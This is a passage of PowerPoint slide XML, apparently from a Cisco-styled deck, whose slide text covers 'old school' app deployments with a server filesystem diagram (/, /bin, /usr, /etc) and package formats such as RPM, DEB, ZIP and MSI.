            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24454032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Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7134D7-3D8F-174D-AE56-7A01959C389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429086" y="1938090"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" err="1">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA6220-359E-E743-8FD8-C3A0A56996E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="3257550"/>
            <a:ext cx="2166966" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>SERVER ONE</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;74;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C5BD2EF-5CBB-EB4D-A153-8BB8D8EA6C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202457" y="2597820"/>
            <a:ext cx="1515655" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557F361B-BCC7-7845-B8E2-F6C18A85A95B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465120" y="1938090"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;73;p14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E97563F-0B9C-F14C-8534-8AB945859382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6501152" y="1938090"/>
            <a:ext cx="994550" cy="308025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00BCEB"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA54E651-7262-CF41-94F3-2FE11457EEE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692763" y="4563853"/>
            <a:ext cx="7995611" cy="449916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="16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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{774FA1B5-2BA1-DB45-94AB-500D17F946B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316650" y="136418"/>
            <a:ext cx="5764376" cy="319204"/>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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Brief History Lesson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4495559-9397-6F4C-B152-0E49CF0F1DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400938" y="489016"/>
            <a:ext cx="7648931" cy="314882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114300" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1075"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342900" indent="-114300" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457200" indent="-123825" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574675" indent="-117475" algn="l" defTabSz="684213" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1600" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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defTabSz="513147">
              <a:spcBef>
                <a:spcPts val="806"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="00BCEB"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BCEB"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Old School App Deployments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Elbow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0E36C1-FAE1-9C42-A5B7-A9AC25CAAB39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="34" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5784430" y="3081699"/>
            <a:ext cx="351705" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Elbow Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{543F344C-D485-014A-BAE4-118829B84318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5267470" y="1905007"/>
            <a:ext cx="351705" cy="1033922"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>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8E7CDB01-7FB5-F345-A81A-DF85ED5B9C6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="35" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="5785486" y="2420913"/>
            <a:ext cx="351705" cy="2111"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>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C38DBEB7-B996-A845-8C76-F094134330BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="0"/>
            <a:endCxn id="36" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6303502" y="1902898"/>
            <a:ext cx="351705" cy="1038143"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="00BCEB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C25B39-0115-854C-97AA-60C5FD7E18F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304806" y="1460807"/>
            <a:ext cx="3843965" cy="2981204"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>RPM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>DEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>ZIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
                <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
                <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
              </a:rPr>
              <a:t>MSI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3458567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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
